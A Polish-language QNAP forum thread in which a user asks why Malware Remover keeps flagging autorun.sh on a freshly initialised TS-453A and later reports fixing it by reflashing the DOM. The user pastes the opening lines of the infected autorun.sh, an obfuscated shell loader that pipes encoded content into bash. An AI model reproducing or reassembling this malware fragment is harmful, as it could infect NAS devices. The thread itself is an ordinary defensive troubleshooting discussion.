Pomoc Malware Remover zaraz po inicjacji TS-453A sygnalizuje problem z autorun.sh

F

Fiscoplan

Nowy użytkownik
Noobie
24 Sierpień 2016
3
0
1
54
QNAP
TS-x53
Ethernet
1 GbE
Witam serdecznie kolegów,

używam rozwiązań QNAP od bardzo wielu lat, choć głównie jako lokalny serwer plików i nic dotychczas nie budziło mojego niepokoju, ale też nigdy nie uruchamiałem aplikacji Malware Remover :)

Obecnie zainicjowałem QNAP TS-453A zupełnie od "zera", na początek z dwoma fabrycznie nowymi HDD w RAID1 i na startowym firmware, gdzie jedną z pierwszych czynności było uruchomienie aplikacji Malware Remover, otrzymuję komunikat:

[Malware Remover] Repaired infected file or folder. Name: /tmp/config/autorun.sh

Każdorazowe uruchomienie Malware Remover, także od razu po zakończeniu poprzedniego procesu skanowania, generuje ten sam komunikat i nic nie zmienia się także po aktualizacji do docelowego firmware: 4.4.1.1081 Build 20191005.

Jest to dla mnie o tyle dziwne, że mówimy o "czystym", fabrycznym systemie.

Czy ktoś orientuje się czy to normalny stan i/lub co mogłoby by być tego przyczyną?

Z góry dziękuję za wskazówkę :)

------------------

Wersja oprogramowania Firmware: 4.4.1.1081 Build 20191005
Model serwera: QNAP TS-453A
 
Wyświetl chronologicznie Sortuj według ilości głosów
Spooky napisał:
A jaką masz zawartość w pliku /tmp/config/autorun.sh?
Kliknij, aby rozwinąć...

Dziękuję za odpowiedź.

Zalogowałem się przez SSH, wykonałem polecenie "cd /tmp/config/",
a potem ls -lah i wychodzi na to, że nie ma tam żadnych plików:

total 0
drwxr-xr-x 2 admin administrators 40 2019-10-07 10:05 ./
drwxrwxrwx 21 admin administrators 2.4K 2019-10-07 11:05 ../

ale po skanowaniu Malware Remover niezmiennie wyrzuca to samo ostrzeżenie.
Dopatrzyłem się w panelu sterowania, że na zakładce Sprzęt jest opcja, która umożliwia podejrzenie zawartości pliku autorun.sh. Widać w nim wyraźnie zaszyfrowaną zawartość, czyli Malware Remover reaguje prawidłowo. Plik musi być zatem standardowo w innej lokalizacji, niż tam, skąd go usuwa Malware Remover. Początkowy fragment autorun.sh wygląda tak:

#!/bin/sh

EDQoiIn=${huGLzA}t${AhmwZ}${OlRfUvv}r; twsSuOW=${zkjSx}${nFmXyfejxB}\\${lJVIB}${pDlCZwkQUP}; JOvyWmEF=${iJskARxBBC}${AMufWK}${sXKwf}${twsSuOW}1${ffCFXl}${qkYuA}${ooWJLXF}33; zWQslWm=${AHyPBVJqwT}${FLZtIg}${SXmGX}${twsSuOW}0${ETWCon}${XFEus}${ZxUjmas}55; vLOGky=${qyIFIxVpuj}${doxVtv}${NzHfY}${twsSuOW}1${Uxspwa}${rkGUo}${ehyqnsC}34; $EDQoiIn 'l*ZjiD<NQw)#'$vLOGky'O(suGz+VSp'$zWQslWm'xyX>;aqAE KYMg=Lk\nFhebUPCf|]$mW}J`'"'"'"c{odIRH!BT'$JOvyWmEF'nrt%v&' 'TszY$vf)S+(&!b"JlpRNg\nUa I=P'$JOvyWmEF'GZ|yk`Cr]'"'"'oeW#d'$zWQslWm';VHnO'$vLOGky'Xcm}%>w{xuLD*qt<hFMEiABQKj' << "PaFVXKdxXNNt" | b${eyjXzG}a${vKTFs}s${bJFhYTi}h

----------------

Wydaje mi się, że autorun.sh rezyduje gdzieś, skąd jest kopiowany (np. po restarcie Qnapa) do /tmp/config/ i tam usuwany przez Malware Remover.

A skoro nie pomaga przywrócenie QNAP'a do ustawień fabrycznych z nowymi dyskami, to pytanie brzmi: gdzie ten plik siedzi w systemie i jak go usunąć / nadpisać w swojej natywnej lokalizacji?
 
Głosuj w górę 0 Zgłoszenie negatywne
Głosuj w górę 0 Zgłoszenie negatywne
Dziękuję Panowie za wskazówki, widziałem już pobieżnie te wątki i tego się właśnie obawiałem, że trzeba będzie pogrzebać w DOM.

Dam znać jak się powiedzie, na razie z nadmiaru obowiązków muszę odwlec operację w czasie.

Pozdrawiam !
Słowo się rzekło, tak więc krótki update.. pomogło wykonanie dość mozolnej procedury na stronie:

Firmware Recovery - QNAPedia

Po wgraniu fabrycznego DOM i aktualizacji firmware, autorun.sh jest czysty i Malware Remover wreszcie nic nie sygnalizuje.

Pozdrawiam i jeszcze raz dziękuję ! :)
 
Głosuj w górę 0 Zgłoszenie negatywne
Musisz się zalogować lub zarejestrować, aby odpowiedzieć tutaj.
Początek strony Dół
Z powrotem